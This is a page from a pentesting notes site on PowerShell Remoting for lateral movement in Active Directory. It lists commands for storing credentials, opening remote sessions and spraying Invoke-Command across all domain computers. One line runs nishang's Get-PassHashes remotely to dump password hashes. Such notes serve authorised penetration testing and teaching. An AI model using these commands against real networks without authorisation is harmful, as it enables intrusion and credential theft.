☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Storing Credentials into the Session
  • Begin a New Session on Another Workstation
  • Running a Stateful Session and Then Entering It
  • Executing Commands Remotely on Another Workstation
  • Spraying Computers to See Where You Have Access
  • Executing Scripts Remotely
  • Execute Locally Loaded Functions on Remote Machines
  • Copying Files Remotely
  1. Windows
  2. Active Directory

Powershell Remoting

Instead of having to connect to a workstation from outside of the network everytime in order to execute commands, if we are already in a Powershell session we can either start a new session in our target box or issue commands on the target remotely from the current session we are in.

Executing commands in such a manner is less noisy of course. You can run scripts or local functions from your current workstation onto your target remotely. You can even issue commands to multiple targets in the network in one statement if you have the privileges to do so (Fan-Out Remoting).

You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not enabled already, but you need Administrator privileges to do so.

This works excellently in conjunction with Pass-the-Hash.

Some of these commands will require PowerView.

Storing Credentials into the Session

  • Method 1: Using the Get-Credential cmdlet from a remote desktop:

$creds = Get-Credential <user>  # then enter the password in the popup
  • Method 2: Using the New-Object-Cmdlet

$user = '<user>'
$pwd = '<password>'
$secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd

Begin a New Session on Another Workstation

Enter-PSSession -ComputerName <computer>

Running a Stateful Session and Then Entering It

$sess = New-PSSession -ComputerName <computer> [-Credential $creds]
Enter-PSSession -Session $sess

Executing Commands Remotely on Another Workstation

Invoke-Command -ComputerName <computer> -ScriptBlock {<command>}
Invoke-Command -Session $sess -ScriptBlock {<command>}

Spraying Computers to See Where You Have Access

Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer)
  • My little script is a bit cleaner...

foreach ($comp in Get-NetComputer) {
    $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$NUL)
    }

Executing Scripts Remotely

Invoke-Command -FilePath <C:\path\to\script> -ComputerName <computer> [-Credential $cred]
  • You can spray this command onto other workstations at once as well...

Invoke-Command -FilePath <C:\path\to\script> -ComputerName (Get-NetComputer)

Execute Locally Loaded Functions on Remote Machines

# Using Get-PassHashes.ps1 from nishang as an example
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList <args>] [-Credential $cred] 2>$NUL

Copying Files Remotely

Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path
PreviousSkeleton KeysNextLateral Movement

Last updated 3 years ago